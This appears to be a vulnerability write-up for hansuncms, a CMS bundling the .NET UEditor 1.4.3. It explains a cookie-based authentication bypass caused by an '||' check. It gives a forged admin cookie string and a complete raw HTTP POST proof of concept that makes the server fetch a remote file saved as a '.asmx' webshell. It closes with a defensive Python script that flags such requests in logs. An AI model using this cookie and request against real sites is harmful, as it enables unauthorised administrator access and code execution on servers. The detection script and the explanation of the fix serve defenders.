hansuncmswebshell

hansuncms Authentication Bypass and File Upload

hansuncms

Authentication bypass: add the following cookies to the request.

```
AdminUser=AdminId=3B17A20D0B04694C&AdminUser=A5D8190690DE7EC5&AdminPwd=28AF506D68AA3AB1A8F5136675B903480F3C4A24DA67438014A80335E37AD6534880AD891A5A15A1&AdminName=A5D8190690DE7EC5&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk
```

poc

The webshell upload is similar to CNVD-2017-20077.

hansuncms ships the .NET version of UEditor 1.4.3 and has an authentication bypass.

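The relevant check in the code:

```
if (context.Request.Cookies["AdminUser"] != null || context.Request.Cookies["AdminUser"]["SysUser"] != "")
```

Because the two conditions are joined with `||`, the check passes as soon as the `AdminUser` cookie is not null; its contents are never verified. Any request that carries an `AdminUser` cookie can therefore use the UEditor upload to upload a webshell.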

poc


```
POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: xxxxxx
Connection: close
Referer: http://xxxxxxxx/cms/Login.aspx
Cookie: AdminUser=AdminId=1&AdminUser=1&AdminPwd=1&AdminName=1&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk
Upgrade-Insecure-Requests: 1

source%5B%5D=http%3A%2F%2Fx.x.x.x%2F1.asmx.jpg%3F.asmx
```
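For defenders, a triage check over logged `catchimage` requests like the one above; this is an added example, not code from hansuncms or UEditor. It assumes request targets and form bodies are available (for example from a WAF or reverse proxy), that the handler takes the saved file's extension from the whole source URL (which is what the `?.asmx` suffix relies on), and the function names and allowlist are hypothetical.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Extensions a catchimage fetch may legitimately be stored under (assumed allowlist).
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


def saved_ext(url):
    # Assumption: the handler derives the extension from the full URL string,
    # query included, so "1.asmx.jpg?.asmx" is stored with ".asmx".
    return posixpath.splitext(url)[1].lower()


def path_ext(url):
    # Extension of the URL path only, with the query string ignored.
    return posixpath.splitext(urlsplit(url).path)[1].lower()


def review_catchimage(target, body):
    """Return one finding per source[] URL that would not be stored as an image."""
    parts = urlsplit(target)
    action = parse_qs(parts.query).get("action", [""])[0].lower()
    if not parts.path.lower().endswith("/controller.ashx") or action != "catchimage":
        return []
    findings = []
    for src in parse_qs(body).get("source[]", []):
        ext = saved_ext(src)
        if ext not in IMAGE_EXTS:
            findings.append({"source": src, "saved_as": ext, "path_ext": path_ext(src)})
    return findings


# Constructed sample records: (request target, urlencoded form body).
SAMPLES = [
    ("/ueditor/net/controller.ashx?action=catchimage",
     "source%5B%5D=http%3A%2F%2Fx.x.x.x%2F1.asmx.jpg%3F.asmx"),
    ("/ueditor/net/controller.ashx?action=catchimage",
     "source%5B%5D=http%3A%2F%2Fimg.example%2Fphoto.png"),
    ("/ueditor/net/controller.ashx?action=config", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        for finding in review_catchimage(target, body):
            print(target, finding)
```

A finding whose `saved_as` differs from `path_ext` means the query string changed the stored extension; the same allowlist applied to the path extension only is the server-side fix for that part of the issue.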
